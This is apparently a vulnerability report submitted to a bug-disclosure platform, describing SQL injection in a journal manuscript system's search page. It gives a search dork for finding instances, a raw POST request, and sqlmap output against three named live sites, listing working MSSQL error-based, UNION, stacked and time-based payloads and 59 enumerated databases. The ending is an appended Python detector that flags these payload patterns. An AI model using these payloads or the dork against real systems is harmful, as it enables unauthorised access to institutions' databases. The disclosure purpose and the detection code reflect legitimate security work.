### Brief description:

It won't be accepted without proving access to the database, huh~~ Fine, resubmitting.

### Details:

http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id=

This search turns up many instances. I picked a few at random to test:

```
POST /web/keysearch.aspx HTTP/1.1
Host: www.XXXX.com
User-Agent: Baiduspider
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cck_lasttime=1410760097025; cck_count=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
```

### Proof of vulnerability:

Case 1: Hunan University

http://dxjykx.cnmanu.cn/

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(100)+CHAR(74)+CHAR(79)+CHAR(71)+CHAR(115)+CHAR(88)+CHAR(77)+CHAR(80)+CHAR(88)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), NULL-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: keyword
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd%' AND 4223=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (78) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 78, 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(75)+CHAR(90)+CHAR(88)+CHAR(113)+CHAR(110)+CHAR(103)+CHAR(76)+CHAR(85)+CHAR(80)+CHAR(114)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 4163=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4163=4163) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (78) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' UNION ALL SELECT 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(97)+CHAR(79)+CHAR(74)+CHAR(71)+CHAR(110)+CHAR(69)+CHAR(116)+CHAR(108)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), 78--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>
[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:41:08] [INFO] testing if current user is DBA
current user is DBA: False
[13:41:08] [INFO] fetching database names
[13:41:08] [INFO] the SQL query used returns 59 entries
available databases [59]:
[*] bl
[*] cdxxgc
[*] cg
[*] cghy
[*] cy
[*] cymx
[*] d1
[*] demcom
[*] demo
[*] dj
[*] dxjykx
[*] Eye
[*] gjzhyx
[*] GuaHao
[*] hh
[*] hhzrkx
[*] hlgl
[*] hnxbyx
[*] hxyqdz
[*] j4e
[*] jjyx
[*] lcjsyx
[*] lcjyzzs
[*] lcsjbx
[*] lcsjwk
[*] lnyxybj
[*] main
[*] master
[*] mfskin
[*] model
[*] mrzxwk
[*] msdb
[*] mz
[*] mzyfs
[*] njsd
[*] nky
[*] Northwind
[*] nxgb
[*] nydxxb
[*] pifu
[*] pubs
[*] rfic
[*] SMS
[*] st
[*] sypfb
[*] tempdb
[*] test
[*] wcbx
[*] wf
[*] wlxb
[*] xdx
[*] xhnj
[*] xjyx
[*] xnxyxb
[*] yxjz
[*] zdblx
[*] zjyx
[*] zr
[*] zxyjh

[13:41:08] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\output\dxjykx.cnmanu.cn'

[*] shutting down at 13:41:08
```

Case 2: Renji Hospital, affiliated with Shanghai Jiao Tong University School of Medicine

http://www.cjge-manuscriptcentral.com

```
D:\Python27\sqlmap>sqlmap.py -r 1.txt --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:25:16

[13:25:16] [INFO] parsing HTTP request from '1.txt'
[13:25:16] [INFO] using 'D:\Python27\sqlmap\output\www.cjge-manuscriptcentral.com\session' as session file
[13:25:16] [INFO] resuming injection data from session file
[13:25:16] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from session file
[13:25:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1'; WAITFOR DELAY '0:0:5';-- AND 'enfS'='enfS&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1' WAITFOR DELAY '0:0:5'-- AND 'ExWQ'='ExWQ&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
---
[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:25:17] [INFO] fetching database names
[13:25:17] [INFO] fetching number of databases
[13:25:17] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
59
[13:25:47] [INFO] retrieved:
[13:25:52] [WARNING] adjusting time delay to 1 second
bl
[13:26:33] [INFO] retrieved: cdxxgc
[13:27:12] [INFO] retrieved: cg
[13:27:25] [INFO] retrieved: cghy
[13:27:51] [INFO] retrieved: cy
[13:28:03] [INFO] retrieved: cymx
[13:28:30] [INFO] retrieved: d1
[13:28:42] [INFO] retrieved: demcom
[13:29:18] [INFO] retrieved: demo
[13:29:44] [INFO] retrieved: dj
[13:29:58] [INFO] retrieved: dxjykx
[13:30:39] [INFO] retrieved: Eye
[13:30:56] [INFO] retrieved: gjzhyx
[13:31:38] [INFO] retrieved: GuaHao
[13:32:13] [INFO] retrieved: hh
[13:32:30] [INFO] retrieved: hhzrkx
[13:33:13] [INFO] retrieved: hlgl
[13:33:43] [INFO] retrieved: hnxbyx
[13:34:26] [INFO] retrieved: hxyqdz
[13:35:07] [INFO] retrieved: j4e
[13:35:27] [INFO] retrieved: jjyx
[13:35:55] [INFO] retrieved: lcjsyx
[13:36:35] [INFO] retrieved: lcjyzzs
[13:37:23] [INFO] retrieved: lcsjbx
```

I didn't let it finish; proving that the vulnerability can retrieve database information should be enough!

Case 3: Chinese Journal of Aesthetic and Plastic Surgery

mr.cnmanu.cn

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 7683=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (41) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' UNION ALL SELECT 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(76)+CHAR(69)+CHAR(116)+CHAR(66)+CHAR(113)+CHAR(78)+CHAR(71)+CHAR(76)+CHAR(75)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58), 41--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' WAITFOR DELAY '0:0:5'--

Place: POST
Parameter: keyword
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd%' AND 2981=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (2981=2981) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (41) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 41, 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(122)+CHAR(72)+CHAR(105)+CHAR(70)+CHAR(111)+CHAR(73)+CHAR(83)+CHAR(98)+CHAR(117)+CHAR(100)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1&butSearch=??&keyword=assd%'; WAITFOR DELAY '0:0:5'--&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1&butSearch=??&keyword=assd%' WAITFOR DELAY '0:0:5'--&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: author
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1%' AND 6529=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6529=6529) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(119)+CHAR(119)+CHAR(101)+CHAR(76)+CHAR(87)+CHAR(114)+CHAR(81)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>
[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:40:55] [INFO] testing if current user is DBA
current user is DBA: False
[13:40:55] [INFO] fetching database names
[13:40:55] [INFO] the SQL query used returns 59 entries
available databases [59]:
[*] bl
[*] cdxxgc
[*] cg
[*] cghy
[*] cy
[*] cymx
[*] d1
[*] demcom
[*] demo
[*] dj
[*] dxjykx
[*] Eye
[*] gjzhyx
[*] GuaHao
[*] hh
[*] hhzrkx
[*] hlgl
[*] hnxbyx
[*] hxyqdz
[*] j4e
[*] jjyx
[*] lcjsyx
[*] lcjyzzs
[*] lcsjbx
[*] lcsjwk
[*] lnyxybj
[*] main
[*] master
[*] mfskin
[*] model
[*] mrzxwk
[*] msdb
[*] mz
[*] mzyfs
[*] njsd
[*] nky
[*] Northwind
[*] nxgb
[*] nydxxb
[*] pifu
[*] pubs
[*] rfic
[*] SMS
[*] st
[*] sypfb
[*] tempdb
[*] test
[*] wcbx
[*] wf
[*] wlxb
[*] xdx
[*] xhnj
[*] xjyx
[*] xnxyxb
[*] yxjz
[*] zdblx
[*] zjyx
[*] zr
[*] zxyjh

[13:40:55] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\output\mr.cnmanu.cn'

[*] shutting down at 13:40:55
```

Reviewers, this should be fine now, right~~~
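Added here as a defender-side illustration (this is not part of the original report and not sqlmap's code): the following Python decodes an application/x-www-form-urlencoded body like the keysearch.aspx request above and flags parameters that carry the MSSQL injection markers present in the reported payloads (WAITFOR DELAY, CONVERT(INT,(SELECT ...)), UNION ALL SELECT, stacked queries after `;`, runs of CHAR() concatenation, and a quote break such as `%' AND`). The indicator patterns, the function name `scan_form_body` and the sample bodies are constructed assumptions; the sample bodies reuse the report's own request parameters, with the two malicious ones shaped like the sqlmap payloads shown above and URL-encoded the way a client would send them.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Heuristic indicators for the techniques sqlmap reported against keysearch.aspx.
# These are constructed patterns, not sqlmap's; tune them against your own traffic.
INDICATORS = {
    "time_based": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "error_based_convert": re.compile(r"\bCONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "stacked_query": re.compile(r";\s*(?:WAITFOR|SELECT|INSERT|UPDATE|DELETE|EXEC)\b", re.I),
    # three or more CHAR(n)+ terms in a row, as in the error-based marker strings
    "char_concat": re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*){3,}", re.I),
    # a closing quote (optionally after a LIKE wildcard) followed by a SQL keyword
    "quote_break": re.compile(r"%?'\s*(?:AND|OR|UNION|;|--)", re.I),
}


def scan_form_body(body: str) -> dict:
    """Decode a urlencoded form body and return {parameter: [indicator names]}
    for every parameter whose decoded value matches at least one indicator."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


# Constructed sample bodies. BASE is the report's own parameter set; urlencode()
# percent-encodes '+', '%' and quotes so parse_qsl() reverses it exactly.
BASE = {"butSearch": "查询", "keyword": "assd", "Lm": "2", "Nian": "2016",
        "operat": "", "Qi": "1", "state": "", "title": "wolf"}
BENIGN_BODY = urlencode({"author": "1", **BASE})
TIME_BASED_BODY = urlencode({"author": "1%'; WAITFOR DELAY '0:0:5'--", **BASE})
ERROR_BASED_BODY = urlencode({
    "author": "1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)"
              "+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE CHAR(48) END))"
              "+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='",
    **BASE})

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_BODY), ("time-based", TIME_BASED_BODY),
                        ("error-based", ERROR_BASED_BODY)]:
        print(label, scan_form_body(body))
```

The scan works on decoded parameter values, so it can be run over request bodies captured by a WAF or reverse proxy in front of the ASP.NET application; the patterns are heuristics, and a legitimate value such as a name containing an apostrophe followed by "and" can trip `quote_break`, so treat hits as alerts to triage rather than automatic blocks.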